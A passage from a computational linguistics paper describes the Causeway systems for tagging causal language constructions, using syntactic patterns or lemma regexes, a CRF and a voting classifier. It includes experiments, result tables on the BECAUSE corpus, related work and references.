test time, can prevent patterns from matching. Additionally, the exact syntactic relations present in a given instance may be altered by the presence of other constructions. For example, if a verb appears as a complement of another verb, the path to the subject will have an additional dependency link. We therefore implemented a second algorithm, Causeway-L, that performs connective discovery based on the sequence of word lemmas and parts of speech: instead of extracting and matching parse patterns, it extracts and matches regular expressions. It then uses a conditional random field to label the argument spans, using features from the parse in a more probabilistic way. Connective Discovery with Regular Expression Patterns At training time, we generate regular expressions that will match sequences of connective and argu- ment lemmas. The regexes also make sure that there are tokens in the correct lexical positions for argu- ments. For instance, upon seeing an example like A because B, it would generate a pattern that matches any sequence of lemmas (the effect range), followed by the lemma because with POS tag IN (the connec- tive), followed by any other sequence of lemmas (the cause range).7 Each subpattern is given its own cap- turing group in the regular expression. At test time, each new sentence is turned into a string of lemmas with POS tags for matching. Matching lemmas can be recovered from the capturing groups. Argument Identification with a CRF Unlike syntactic patterns, regular expressions can- not pinpoint the cause and effect arguments; they can only give ranges within which those arguments must appear. Thus, the argument ID stage for this pipeline starts with much less information. We treat the task of argument ID as a sequence labeling problem: given a particular regex-derived connective, the system must identify which tokens are in the cause, which are in the effect, and which are neither. We use a standard linear-chain CRF for this task, implemented with the CRFsuite library.8 7The actual regular expression that encodes this is: (ˆ| )([\S]+ )+?(because/IN) ([\S]+ )+?. 8http://www.chokkan.org/software/ 123 • The lemma of wi • The POS tag of wi • Whether wi ∈ C • The dependency parse path between wi and the token in C that is closest in the parse tree • The absolute lexical distance between wi and the lexically closest token in C • The signed lexical distance between wi and the lexically closest token in C • Whether wi is in the parse tree (false for punctua- tion and several other non-argument token types) • The regex pattern that matched C • The cross-product of the regex pattern feature and the parse path feature • The position of wi relative to C • Whether the lemma of wi is alphanumeric Table 4: Features used for CRF argument ID. For each pos- sible connective C (a set of tokens), features are extracted from each word wi in the sentence. All non-numeric fea- tures are binarized. The features for argument ID are listed in Table 4. 4.3 Voting Classifier for Filtering The pattern-matching stage overgenerates for two reasons. First, due to ambiguity of both words and constructions, not all instances of a given pattern are actually causal. Since, for example, has both causal and temporal senses, which are not distinguished either lexically or syntactically. Second, the patterns do not filter for important constructional elements like tense and modality (e.g., example 8 in Table 1 requires modality of necessity in the cause). Thus, pattern matching alone would yield high recall but low precision. To account for this, the final stage of both pipelines is a filter that determines whether each possible con- nective instance, along with its arguments, is in fact being used in a causal construction. This classification task is somewhat, but not en- tirely, heterogeneous. Some aspects are universal – there are regularities in what typically causes what – crfsuite/. We use the python-crfsuite wrapper (https: //github.com/tpeng/python-crfsuite/). 9For this purpose, we represent the tense of a verb as the POS of the verb plus the string of auxiliaries attached to it. The tense of a non-verb is null. For copulas, both the POS of the copula and the POS of its object are included. Connective features: • The label on the dependency from h to its parent • The part of speech of h’s parent • The sequence of connective words* • The sequence of connective lemmas* • Each pattern that matched the connective* Argument features: • The POS tags of c and e • The generalized POS tags of c and e (e.g., N for either NNP or NNS) • The tenses9 of c and e, both alone and conjoined • The label on each child dependency of c and e • For verbs, the set of child dependency labels • The number of words between c and e • The dependency path between c and e • The length of the dependency path from c to e • Each closed-class child lemma of e and of c • The domination relationship between c and e (dominates, dominated by, or independent) • The sets of closed-class child lemmas of e and c • The conjoined NER tags of c and e • Initial prepositions of the cause/effect spans, if any • Each POS 1-skip-2-gram in the cause/effect spans • Each lemma 1-skip-2-gram in the cause/effect spans that was seen at least 4 times in training • Each WordNet hypernym of c and e† Table 5: Features for the causal language candidate filter. c indicates the cause head, e the effect head, and h the connective head. All non-numeric features are binarized. * Used only for per-connective classifiers. † Used only for the global classifier. while others are construction-dependent. To incorpo- rate both kinds of information, a separate soft-voting classifier is created for each unique sequence of con- nective words. Each classifier averages the proba- bility estimates of three less-reliable classifiers: a global logistic regression classifier, which is shared between all connectives; a per-connective logistic regression classifier; and a per-connective classifier that chooses the most frequent label for that connec- tive. Our classifier thus differs slightly from typical voting classifiers: rather than the ensemble consisting of multiple algorithms trained on the same data, our ensemble includes one generalist and two specialists. We use the scikit-learn 0.17.1 (Pedregosa et al., 2011) implementation of logistic regression with L1 regularization and balanced class weights. The logis- tic regression classifiers consider a variety of features 124 derived from the matched pattern, the connective words matching, the argument heads, and the parse tree (see Table 5). An instance is tagged as causal if the soft vote assigns it a probability above 0.45. This cutoff, close to the prior of 0.5, was tuned for F1 on a different random split of the data than was used in the experiments below. In our experiments, the cutoff made little difference to scores. 5 Experiments 5.1 Baselines Our task differs significantly from existing tasks such as frame-semantic parsing, both in the forms of al- lowable triggers and in the semantic relationships tar- geted. Our results are therefore not directly compara- ble to a frame-semantic parsing baseline. Instead, we compare our end-to-end results against an argument- aware most-frequent-sense (MFS) baseline. At training time, the baseline first extracts the set of sequences of connective lemmas – i.e., {〈prevent, from〉,〈because, of〉, . . .}. It then builds a table t with one entry for each combination of con- nective and argument parse path, recording how many more times it has been causal than non-causal. For example, consider the sentence The flu pre- vented me from attending. After finding that prevent and from are present in the correct order, the baseline considers every pair (c,e) of non-connective words within a parse radius of two links from the connec- tive. Each (c,e) is considered a possible cause/effect head pair for prevent from. For each pair, it finds the shortest path of dependency links from either prevent or from to c and e (call these paths dc and de). If prevent from is annotated as causal, with cause head c and effect head e, the system increments the count t{prevent from,dc,de}; otherwise, it decrements it. The test algorithm finds the same set of possible (connective, cause head, effect head) tuples in the test sentence. For each tuple, if the corresponding entry in t is greater than 0, the system tags a causal language instance. Argument heads are expanded into spans using the algorithm from Causeway-S. In addition to an end-to-end baseline, we wished to test how helpful our three-way voting classifier is. For each pipeline, then, we also compare that classifier against a most-frequent-sense baseline that chooses the most frequent label (causal or not-causal) for each connective, with connectives differentiated by their lemma sequences. The baseline classifier has no access to any information about the arguments. 5.2 Experiment 1: Pipeline Comparison In this experiment, we measured the performance of Causeway-S, Causeway-L, and the baseline on the tasks of connective discovery and argument ID. We also tried taking the union of each system’s outputs with the baseline’s. Because of the small size of BECAUSE, we report averaged metrics from 20-fold cross-validation, with fold size measured by sentence count. All pipelines were run on the same folds. Evaluation Metrics For connective discovery, we report precision, re- call, and F1 for connectives, requiring connectives to match exactly. In counting true positives and false negatives, the only gold-standard instances counted are those with both a cause and an effect, in keeping with the task definition. For argument ID, we split out metrics by causes and effects. For each, we report: • percent agreement on exact spans • percent agreement on heads • the average Jaccard index (Jaccard, 1912) for gold-standard vs. predicted spans, defined as J(A,B) = |A∩B| |A∪B| , where A and B are the sets of tokens in the two spans. This metric reflects how well the argument spans overlap when they do not match exactly. All argument metrics are reported only for correctly predicted connectives, as there is no way to auto- matically evaluate argument spans for false positives. Note that as a result, argument ID scores are not directly comparable between pipelines – the scores represent how well argument ID works given the previous stage, rather than in an absolute sense. We use the same metrics for Experiments 2 and 3. 5.3 Experiment 2: Ablation Studies Our second experiment explores the impact of vari- ous design choices by eliminating individual design elements. We report results from using the global and connective-specific classifiers on their own, with- out the soft-voting ensemble. (The MFS classifier is 125 tested alone as part of Experiment 1.) We also report results from the ensemble classifier without using any features that primarily reflect world knowledge: NER tags, WordNet hypernyms, and lemma skip-grams. 5.4 Experiment 3: Effects of Parse Errors In our third experiment, we examined the effects of parse errors on our pipelines’ performance. We com- pared each pipeline’s performance with and without gold-standard parses, using only the Penn Treebank portion of BECAUSE. For gold-standard runs, we used the Stanford dependency converter (De Marn- effe et al., 2006) to convert the gold parses into de- pendency format. We report averaged results from 20-fold cross-validation on this subcorpus. 6 Experimental Results and Analysis 6.1 Experiment 1 Results Results from Experiment 1 are shown in Table 6. Our most important conclusion from these results is that a classifier can indeed learn to recognize many of the subtleties that distinguish causal constructions from their similar non-causal counterparts. Even our end-to-end baseline offers moderate performance, but Causeway-L outperforms it at connective discovery by over 14 F1 points, and Causeway-S outperforms it by 18 points. The design of the filter is a significant contrib- utor here. The MFS classifier alone substantially underperforms the voting classifier, particularly for the syntactic pipeline. The small connectives filter makes up some of the difference, but the full pipeline still beats the MFS filter by 4.4 points for the lexical system and 6.7 points for the syntax-based system. When our pipelines are combined with the end-to- end baseline, the results are better still, beating the baseline alone by 21.4 points. This supports our hy- pothesis that causal construction recognition rests on a combination of both shallow and deep information. As expected, both pipelines show high recall but low precision for the connective discovery stage. (Much of the remaining gap in recall came simply from the long tail of constructions – about half of connective types never saw a pattern match.) The filter does balance out precision and recall for a bet- ter F1. However, as the filter’s steep drop in recall suggests, more work is needed to upweight positive instances. Examining the classifier scores reveals that the filter is doing a good job of assigning low probability to negative instances: the vast majority of false pattern matches are clustered below a probabil- ity of 0.5, whereas the positives are peppered more evenly over the probability spectrum. Unfortunately, the positives’ probabilities are not clustered on the high end, as they should be. Significant leverage could be gained just from im- proving classification for the connective to. For both pipelines, this one connective accounted for 20–25% of end-to-end false positives and false negatives, and nearly half of all misclassifications by the filter. Many of the remaining errors (about 40%) came from just a few simple but highly ambiguous/polysemous con- nectives, including if, for, and so. For complex con- structions (MWEs or more complex syntactic struc- tures), Causeway-L achieved 42% F1 and Causeway- S achieved 48%. Overall, then, it seems that the classifier is doing well even at the cases that would challenge typical semantic parsing systems, but it needs some features that will allow it to upweight positive instances of a few challenging words. For argument ID, both techniques do reasonably well at recovering exact argument spans, and the HC and HE columns show that even when the exact spans do not match, the key content words are mostly correct. The low Jaccard indices, meanwhile, indi- cate that there is plenty of room for improvement in finding not just heads, but full spans. Interestingly, effects seem to be harder to recover than causes. The likely culprit is the difference in lengths between the two types of arguments. The distribution of cause lengths is skewed toward low numbers, with a peak at 2 and a median of 5, while effects have a smoother peak at 5 with a median of 7 (Figure 2). The difference makes it harder for the system to guess full effect spans, and even for heads there are more plausible options. The length dispar- ity, in turn, is probably due to the fact that causes are likely to be subjects (19%) or nominal modifiers (13%), which skew short, whereas most effects are primary clauses (24%), complements (30%), or direct objects (12%), which are often more complex. 6.2 Experiment 2 Results Results for Experiment 2 are shown in Table 7. The results using single classifiers, rather than an 126 Connectives Causes Effects Pipeline P R F1 SC HC JC SE HE JE Causeway-S w/o classifier 7.3 71.9 13.2 65.0 84.3 39.3 30.4 63.0 30.7 Causeway-S w/ MFS 40.1 37.9 38.6 71.0 87.6 42.0 34.3 64.4 31.9 Causeway-S w/ MFS + SC filter 60.9 36.2 45.1 75.1 92.3 42.9 40.7 75.2 35.8 Causeway-S w/ classifier 51.9 47.6 49.4 68.7 86.9 39.9 38.0 72.5 34.1 Causeway-S w/ classifier + SC filter 57.7 47.4 51.8 67.1 84.4 39.0 37.7 70.7 33.4 Causeway-L w/o classifier 8.1 91.1 14.8 56.8 67.6 33.1 39.5 59.4 30.9 Causeway-L w/ MFS 61.2 34.8 44.1 73.9 84.7 42.3 51.2 74.3 37.6 Causeway-L w/ MFS + SC filter 61.3 33.9 43.5 74.5 85.0 42.5 50.8 74.0 37.4 Causeway-L w/ classifier 59.0 40.6 47.9 74.5 85.9 42.7 53.3 76.1 38.2 Causeway-L w/ classifier + SC filter 60.4 39.9 47.9 74.3 85.8 42.6 53.3 76.4 38.2 Baseline 88.4 21.4 33.8 74.1 94.7 43.7 48.4 83.3 38.4 Baseline + Causeway-S 59.6 51.9 55.2 67.7 85.8 39.5 39.5 73.1 34.2 Baseline + Causeway-L 62.3 45.2 52.3 73.6 88.9 42.8 53.9 78.6 38.7 Table 6: Results for Experiment 1. SC and SE indicate exact span match for causes and effects, respectively; HC and HE indicate percentage accuracy for cause and effect heads; and JC and JE indicate cause and effect Jaccard indices. “SC filter” indicates the filter for smaller overlapping connectives. For the combinations of the baseline with Causeway, the union of the baseline’s and Causeway’s outputs was passed to the SC filter. 1 5 10 15 20 Argument length (in tokens) 0 50 100 150 C ou nt Causes Effects Figure 2: Distributions of cause and effect span lengths in the BECAUSE corpus (for instances with both arguments). ensemble, uphold our design of combining multiple information sources. Even the best non-ensemble filter, the per-connective filter in Causeway-S, under- performs its ensemble counterpart by 3.1 points. Likewise, the results from removing world- knowledge features confirm that this knowledge sig- nificantly assists the classifier beyond what surface- level features alone can provide. World knowledge features add 2.4 points for Causeway-L and 2.8 points for Causeway-S. 6.3 Experiment 3 Results from Experiment 3 are shown in Table 8. As expected, Causeway-S improved significantly with gold-standard parses, whereas Causeway-L gets only a tiny boost. Surprisingly, Causeway-S did not improve from better TRegex matching of connectives per se. In fact, all scores for connective matching from the first stage were worse with gold-standard parses. Instead, the improvement appears to come from argument identification: better parses made it easier to identify argument heads, which in turn made the many features based on those heads more reliable. This is supported by the high argument head accuracy with gold parses. Further, when we ran the baseline on the PTB subcorpus with and without gold parses, we saw a similar improvement. Thus, although the limited data and the classifier’s failure to upweight positives are still the primary handicaps, better parses would be somewhat helpful for at least the syntax-based approach. 7 Related Work Our work is of course based on CxG, which has inspired a number of NLP efforts. On the language- resource side, the FrameNet group, noting the many aspects of meaning that are not fully captured in an analysis of lexical triggers, has begun an extensive project to document and annotate grammatical con- 127 Connectives Causes Effects Pipeline Classifiers Ablated P R F1 SC HC JC SE HE JE Causeway-S – 57.7 47.4 51.8 67.1 84.4 39.0 37.7 70.7 33.4 Causeway-S Both per-connective 40.8 50.4 44.9 65.6 82.8 38.1 36.8 68.8 32.6 Causeway-S Global/most-freq. 47.1 51.2 48.7 66.0 82.3 38.3 36.3 69.1 33.0 Causeway-S Knowledge features 49.5 49.0 49.0 68.9 85.1 39.8 38.3 71.7 33.4 Causeway-L – 60.4 39.9 47.9 74.3 85.8 42.6 53.3 76.4 38.2 Causeway-L Both per-connective 43.6 40.0 41.5 74.5 88.5 42.4 53.9 76.4 38.4 Causeway-L Global/most-freq. 46.3 38.9 42.1 75.6 86.8 43.1 51.3 74.6 37.6 Causeway-L Knowledge features 55.5 38.9 45.5 74.8 87.3 42.9 52.1 75.5 37.7 Table 7: Results for Experiment 2. Unablated full-pipeline results from Table 6 are included for comparison. (a) With automatically parsed data Connectives Causes Effects Pipeline P R F1 SC HC JC SE HE JE Causeway-S w/o classifier 14.9 73.3 24.7 63.6 90.9 40.3 18.1 72.7 25.3 Causeway-S w/ classifier + SC filter 54.7 40.2 45.7 78.7 98.4 44.6 46.0 78.4 36.7 Causeway-L w/o classifier 9.3 84.6 16.7 59.4 68.5 33.1 43.2 62.1 31.8 Causeway-L w/ classifier + SC filter 52.4 37.2 43.2 72.9 84.5 40.0 52.3 73.4 35.7 (b) With gold-standard parses Connectives Causes Effects Pipeline P R F1 SC HC JC SE HE JE Causeway-S w/o classifier 10.2 70.6 17.7 79.4 98.1 45.7 52.8 90.2 41.3 Causeway-S w/ classifier + SC filter 62.7 51.6 56.0 80.2 96.4 45.6 59.0 92.7 43.4 Causeway-L w/o classifier 9.1 84.1 16.4 57.8 68.2 33.3 53.0 68.0 34.4 Causeway-L w/ classifier + SC filter 56.4 37.9 44.3 77.0 85.3 41.8 67.2 83.4 40.4 Table 8: Results for Experiment 3. structions in English (Fillmore et al., 2012). Similar efforts are underway for VerbNet (Bonial et al., 2011) and PropBank (Bonial et al., 2014). On the NLP- tools side, some work has been done on parsing text directly into constructions, particularly through the formalisms of Fluid Construction Grammar (Steels, 2012) and Embodied Construction Grammar (Bergen and Chang, 2005), which take a “constructions all the way down” approach. Some HPSG parsers and formalisms, particularly those based on the English Resource Grammar (Copestake and Flickinger, 2000; Flickinger, 2011) or Sign-Based Construction Gram- mar (Boas and Sag, 2012), also take constructions into account. Thus far, however, only a few attempts (e.g., Hwang and Palmer, 2015) have been made to integrate constructions with robust, broad-coverage NLP tools/representations. Other aspects of our work are more closely related to previous NLP research. Our task is similar to frame-semantic parsing (Baker et al., 2007), the task of automatically producing FrameNet annotations. Lexical triggers of a frame correspond roughly to our causal connectives, and both tasks require iden- tifying argument spans for each trigger. The tasks differ in that FrameNet covers a much wider range of semantics, with more frame-specific argument types, but its triggers are limited to lexical units, whereas we permit arbitrary constructions. Our multi-stage approach is also loosely inspired by SEMAFOR and subsequent FrameNet parsers (Das et al., 2014; Roth 128 and Lapata, 2015; Täckström et al., 2015). Several representational schemes have incorpo- rated elements of causal language. PDTB includes reason and result relations; FrameNet frames often include Purpose and Explanation roles; preposition schemes (e.g., Schneider et al., 2015, 2016) include some purpose- and explanation-related senses; and VerbNet and PropBank include verbs of causation. As described in §1, however, none of these covers the full range of linguistic realizations of causality. The ASFALDA French FrameNet project recently proposed a reorganized frame hierarchy for causality, along with more complete coverage of French causal lexical units (Vieu et al., 2016). Some constructions would still be too complex to represent, but under their framework, many of our insights could likely be merged into mainline English FrameNet. Other projects have attempted to address causality more specifically. For example, a small corpus of event pairs conjoined with and has been annotated as causal or not causal (Bethard and Martin, 2008), and a classifier was built for such pairs (Bethard et al., 2008). The CaTeRS annotation scheme (Mostafazadeh et al., 2016), based on TimeML, also includes causal relations, but from a commonsense reasoning standpoint rather than a linguistic one. A broader-coverage linguistic approach was taken by Mirza and Tonelli (2014). They enriched TimeML to include causal links and their lexical triggers, and built an SVM-based system for predicting them. Their work differs from ours in that it requires argu- ments to be TimeML events; it requires connectives to be contiguous spans; and their classifier relies on gold-standard TimeML annotations. More recently, Hidey and McKeown (2016) au- tomatically constructed a large dataset with PDTB- style AltLex annotations for causality. Using this cor- pus, they achieved high accuracy in finding causality indicators. This was a somewhat easier task than ours, given their much larger dataset and that they limited their causal triggers to contiguous phrases. Their dataset and methods for constructing it, how- ever, could likely be adapted to improve our systems. Our pattern-matching techniques are based on ear- lier work on LEXICO-SYNTACTIC PATTERNS. These patterns, similarly represented as fragments of de- pendency parse trees with slots, have proven useful for hypernym discovery (Hearst, 1992; Snow et al., 2005). They have also been used both for the more limited task of detecting causal verbs (Girju, 2003) and for detecting causation relations that are not ex- clusively verbal (Ittoo and Bouma, 2011). Our work extends this earlier research in several ways. We propose several methods (CRF-based ar- gument ID and statistical classifiers) for overcoming the ambiguity inherent in such patterns. We also take care to ground our notion of causality in a princi- pled annotation scheme for causal language. This avoids the difficulties of agreeing on what counts as real-world causation (see Grivaz, 2010). 8 Conclusion and Future Work With this work, we have demonstrated the viability of two approaches to tagging causal constructions. We hope that the constructional perspective will prove applicable to other domains, as well. Our code and corpus are available at https://github.com/ duncanka/causeway and https://github. com/duncanka/BECauSE, respectively. In the immediate future, we plan to explore more sophisticated, flexible algorithms for tagging causal constructions that rely less on fixed patterns. Two promising directions for flexible matching are tree kernels and parse forests (Tomita, 1985). We are also pursuing a neural, transition-based tagging model. In parallel, we are working to extend our ap- proaches to cases where causality is expressed using temporal language or other overlapping relations. We are developing a further expanded corpus that will include annotations for such cases, and we expect to extend our algorithms to these new annotations. In the longer run, we plan to demonstrate the use- fulness of our predicted causal language annotations for an application-oriented semantic task such as question-answering. Acknowledgments We thank Jeremy Doornbos, Donna Gates, Nora Ka- zour, Chu-Cheng Lin, Michael Mordowanec, and Spencer Onuffer for all their help with refining the an- notation scheme and doing the annotation work. We are also grateful to Nathan Schneider for his invalu- able suggestions, and to the anonymous reviewers and TACL editors for their useful feedback. 129 References Collin Baker, Michael Ellsworth, and Katrin Erk. 2007. SemEval’07 task 19: frame semantic struc- ture extraction. In Proceedings of the 4th Interna- tional Workshop on Semantic Evaluations, pages 99–104. Association for Computational Linguis- tics, Prague, Czech Republic. Collin F. Baker, Charles J. Fillmore, and John B. Lowe. 1998. The Berkeley FrameNet Project. In Proceedings of the 17th International Conference on Computational Linguistics, volume 1, pages 86–90. Association for Computational Linguistics, Montreal, Canada. Timothy Baldwin and Su Nam Kim. 2010. Multi- word expressions. In Nitin Indurkhya and Fred J. Damerau, editors, Handbook of Natural Language Processing, volume 2, pages 267–292. CRC Press, Boca Raton, FL. Jonathan Berant, Vivek Srikumar, Pei-Chun Chen, Abby Vander Linden, Brittany Harding, Brad Huang, Peter Clark, and Christopher D. Manning. 2014. Modeling biological processes for read- ing comprehension. In Proceedings of the 2014 Conference on Empirical Methods in Natural Lan- guage Processing (EMNLP), pages 1499–1510. Association for Computational Linguistics, Doha, Qatar. Benjamin Bergen and Nancy Chang. 2005. Embod- ied construction grammar in simulation-based lan- guage understanding. Construction grammars: Cognitive grounding and theoretical extensions, 3:147–190. Steven Bethard, William J Corvey, Sara Klingenstein, and James H. Martin. 2008. Building a corpus of temporal-causal structure. In Proceedings of the 6th International Conference on Language Re- sources and Evaluation (LREC 2008), pages 908– 915. European Languages Resources Association, Marrakech, Morocco. Steven Bethard and James H. Martin. 2008. Learning semantic links from a corpus of parallel temporal and causal relations. In Proceedings of the 46th Annual Meeting of the Association for Computa- tional Linguistics on Human Language Technolo- gies (ACL-08 HLT): Short Papers, pages 177–180. Association for Computational Linguistics, Colum- bus, Ohio. Hans Christian Boas and Ivan A. Sag, editors. 2012. Sign-based construction grammar. CSLI Publica- tions, Stanford, CA. Claire Bonial, Julia Bonn, Kathryn Conger, Jena D. Hwang, and Martha Palmer. 2014. PropBank: Se- mantics of new predicate types. In Proceedings of the 9th International Conference on Language Resources and Evaluation (LREC 2014), pages 3013–3019. European Languages Resources Asso- ciation, Reykjavik, Iceland. Claire Bonial, Susan Windisch Brown, Jena D. Hwang, Christopher Parisien, Martha Palmer, and Suzanne Stevenson. 2011. Incorporating coercive constructions into a verb lexicon. In Proceedings of the ACL 2011 Workshop on Relational Models of Semantics, pages 72–80. Association for Com- putational Linguistics, Portland, Oregon. Juliette Conrath, Stergos Afantenos, Nicholas Asher, and Philippe Muller. 2014. Unsupervised extrac- tion of semantic relations using discourse cues. In Proceedings of the 25th International Conference on Computational Linguistics (COLING 2014), pages 2184–2194. Dublin City University and As- sociation for Computational Linguistics, Dublin, Ireland. Ann A Copestake and Dan Flickinger. 2000. An open source grammar development environment and broad-coverage English grammar using HPSG. In Proceedings of the 2nd International Conference on Language Resources and Evaluation (LREC 2000), pages 591–600. European Language Re- sources Association, Athens, Greece. Dipanjan Das, Desai Chen, André F.T. Martins, Nathan Schneider, and Noah A. Smith. 2014. Frame-semantic parsing. Computational Linguis- tics, 40(1):9–56. Marie-Catherine De Marneffe, Bill MacCartney, Christopher D. Manning, et al. 2006. Generat- ing typed dependency parses from phrase structure parses. In Proceedings of the Fifth International Conference on Language Resources and Evalua- tion (LREC 2006), volume 6, pages 449–454. Eu- ropean Languages Resources Association, Genoa, Italy. 130 Stuart Dreyfus and Robert Wagner. 1971. The Steiner problem in graphs. Networks, 1(3):195–207. Jesse Dunietz, Lori Levin, and Jaime Carbonell. 2015. Annotating causal language using corpus lexicog- raphy of constructions. In Proceedings of The 9th Linguistic Annotation Workshop (LAW IX), pages 188–196. Association for Computational Linguis- tics, Denver, CO. Charles J. Fillmore. 2012. Encounters with language. Computational Linguistics, 38(4):701–718. Charles J. Fillmore, Paul Kay, and Mary Catherine O’Connor. 1988. Regularity and idiomaticity in grammatical constructions: The case of let alone. Language, 64(3):501–538. Charles J. Fillmore, Russell Lee-Goldman, and Rus- sell Rhodes. 2012. Sign-based construction gram- mar, chapter The FrameNet constructicon, pages 309–372. In Boas and Sag (2012). Dan Flickinger. 2011. Accuracy vs. robustness in grammar engineering. In Emily M. Bender and Jennifer E. Arnold, editors, Language from a cog- nitive perspective: Grammar, usage, and process- ing, volume 201 of CSLI Lecture Notes, pages 31–50. CSLI Publications. Roxana Girju. 2003. Automatic detection of causal relations for question answering. In Proceedings of the ACL 2003 workshop on Multilingual summa- rization and question answering, volume 12, pages 76–83. Association for Computational Linguistics, Sapporo, Japan. Adele Goldberg. 1995. Constructions: A Construc- tion Grammar Approach to Argument Structure. Chicago University Press, Chicago, IL. Cécile Grivaz. 2010. Human judgements on causa- tion in French texts. In Proceedings of the 7th International Conference on Language Resources and Evaluation (LREC 2010), pages 2626–2631. European Languages Resources Association, Val- letta, Malta. Marti A. Hearst. 1992. Automatic acquisition of hy- ponyms from large text corpora. In Proceedings of the 14th Conference on Computational Linguis- tics, volume 2, pages 539–545. Association for Computational Linguistics, Nantes, France. Christopher Hidey and Kathleen McKeown. 2016. Identifying causal relations using parallel Wikipedia articles. In Proceedings of the 54th Annual Meeting of the Association for Computa- tional Linguistics, pages 1424–1433. Association for Computational Linguistics, Berlin, Germany. Jena D. Hwang and Martha Palmer. 2015. Identifica- tion of caused motion constructions. In Proceed- ings of the Fourth Joint Conference on Lexical and Computational Semantics (* SEM 2015), pages 51–60. Association for Computational Linguistics, Denver, CO. Ashwin Ittoo and Gosse Bouma. 2011. Extracting explicit and implicit causal relations from sparse, domain-specific texts. In Proceedings of the 16th International Conference on Natural Language Processing and Information Systems (NLDB ’11), pages 52–63. Springer-Verlag, Alicante, Spain. Paul Jaccard. 1912. The distribution of the flora in the alpine zone. New Phytologist, 11(2):37–50. Dan Klein and Christopher D. Manning. 2003. Ac- curate unlexicalized parsing. In Proceedings of the 41st Annual Meeting on Association for Com- putational Linguistics, volume 1, pages 423–430. Association for Computational Linguistics, Sap- poro, Japan. Lori Levin, Teruko Mitamura, Davida Fromm, Brian MacWhinney, Jaime Carbonell, Weston Feely, Robert Frederking, Anatole Gershman, and Car- los Ramirez. 2014. Resources for the detection of conventionalized metaphors in four languages. In Proceedings of the 9th International Conference on Language Resources and Evaluation (LREC 2014), pages 498–501. European Language Re- sources Association, Reykjavik, Iceland. Roger Levy and Galen Andrew. 2006. TRegex and TSurgeon: tools for querying and manipulating tree data structures. In Proceedings of the 5th Inter- national Conference on Language Resources and Evaluation (LREC 2006), pages 2231–2234. Eu- ropean Language Resources Association, Genoa, Italy. Mitchell Marcus, Grace Kim, Mary Ann Marcinkiewicz, Robert MacIntyre, Ann Bies, Mark Ferguson, Karen Katz, and Britta Schas- berger. 1994. The Penn Treebank: Annotating 131 predicate argument structure. In Proceedings of the Workshop on Human Language Technol- ogy, HLT ’94, pages 114–119. Association for Computational Linguistics, Plainsboro, NJ. Paramita Mirza and Sara Tonelli. 2014. An analysis of causality between events and its relation to tem- poral information. In Proceedings of the 25th Inter- national Conference on Computational Linguistics (COLING 2014), pages 2097–2106. Dublin City University and Association for Computational Lin- guistics, Dublin, Ireland. Nasrin Mostafazadeh, Alyson Grealish, Nathanael Chambers, James Allen, and Lucy Vanderwende. 2016. CaTeRS: Causal and temporal relation scheme for semantic annotation of event structures. In Proceedings of the 4th Workshop on Events: Definition, Detection, Coreference, and Represen- tation, pages 51–61. Association for Computa- tional Linguistics, San Diego, CA. Joakim Nivre, Marie-Catherine de Marneffe, Filip Ginter, Yoav Goldberg, Jan Hajic, Christopher D. Manning, Ryan McDonald, Slav Petrov, Sampo Pyysalo, Natalia Silveira, Reut Tsarfaty, and Daniel Zeman. 2016. Universal dependencies v1: A multilingual treebank collection. In Proceedings of the 10th International Conference on Language Resources and Evaluation (LREC 2016). European Language Resources Association, Portoro, Slove- nia. Martha Palmer, Daniel Gildea, and Paul Kingsbury. 2005. The Proposition Bank: An annotated cor- pus of semantic roles. Computational Linguistics, 31(1):71–106. Fabian Pedregosa, Gaël Varoquaux, Alexandre Gram- fort, Vincent Michel, Bertrand Thirion, Olivier Grisel, Mathieu Blondel, Peter Prettenhofer, Ron Weiss, Vincent Dubourg, Jake Vanderplas, Alexan- dre Passos, David Cournapeau, Matthieu Brucher, Matthieu Perrot, and Édouard Duchesnay. 2011. Scikit-learn: Machine learning in Python. Journal of Machine Learning Research, 12:2825–2830. Rashmi Prasad, Nikhil Dinesh, Alan Lee, Eleni Milt- sakaki, Livio Robaldo, Aravind Joshi, and Bonnie Webber. 2008. The Penn Discourse TreeBank 2.0. In Proceedings of the 6th International Conference on Language Resources and Evaluation (LREC 2008), pages 2961–2968. European Language Re- sources Association, Marrakech, Morocco. Michael Roth and Mirella Lapata. 2015. Context- aware frame-semantic role labeling. Transactions of the Association for Computational Linguistics, 3:449–460. Evan Sandhaus. 2008. The New York Times anno- tated corpus. Linguistic Data Consortium. Jonathan Schaffer. 2014. The metaphysics of causation. In Edward N. Zalta, editor, The Stanford Encyclopedia of Philosophy. Summer 2014 edition. http://plato.stanford. edu/archives/sum2014/entries/ causation-metaphysics/. Nathan Schneider, Jena D. Hwang, Vivek Srikumar, Meredith Green, Abhijit Suresh, Kathryn Conger, Tim O’Gorman, and Martha Palmer. 2016. A cor- pus of preposition supersenses. In Proceedings of the 10th Linguistic Annotation Workshop (LAW X), pages 99–109. Association for Computational Linguistics, Berlin, Germany. Nathan Schneider, Vivek Srikumar, Jena D. Hwang, and Martha Palmer. 2015. A hierarchy with, of, and for preposition supersenses. In Proceedings of The 9th Linguistic Annotation Workshop (LAW IX), pages 112–123. Association for Computational Linguistics, Denver, CO. Karin K. Schuler. 2005. VerbNet: A Broad- Coverage, Comprehensive Verb Lexicon. Ph.D. thesis, University of Pennsylvania, Philadelphia, PA. AAI3179808. Noah A. Smith, Claire Cardie, Anne Washington, and John Wilkerson. 2014. Overview of the 2014 NLP unshared task in poliinformatics. In Proceedings of the ACL 2014 Workshop on Language Tech- nologies and Computational Social Science, pages 5–7. Association for Computational Linguistics, Baltimore, MD. Rion Snow, Daniel Jurafsky, and Andrew Y. Ng. 2005. Learning syntactic patterns for automatic hyper- nym discovery. In Advances in Neural Information Processing Systems 17 (NIPS 2004), pages 1297– 1304. MIT Press, Vancouver, Canada. Luc Steels, editor. 2012. Computational Issues in Fluid Construction Grammar. Lecture Notes in 132 Computer Science. Springer Verlag, Berlin, Ger- many. Oscar Täckström, Kuzman Ganchev, and Dipanjan Das. 2015. Efficient inference and structured learn- ing for semantic role labeling. Transactions of the Association for Computational Linguistics, 3:29– 41. Masaru Tomita. 1985. An efficient context-free pars- ing algorithm for natural languages. In Proceed- ings of the 9th International Joint Conference on Artificial Intelligence (IJCAI), volume 2, pages 756–764. Morgan Kaufmann Publishers Inc., Los Angeles, CA. Laure Vieu, Philippe Muller, Marie Candito, and Mar- ianne Djemaa. 2016. A general framework for the annotation of causality based on FrameNet. In Pro- ceedings of the 10th International Conference on Language Resources and Evaluation (LREC 2016), pages 3807–3813. European Language Resources Association, Portoro, Slovenia. Phillip Wolff, Bianca Klettke, Tatyana Ventura, and Grace Song. 2005. Expressing causation in En- glish and other languages. In 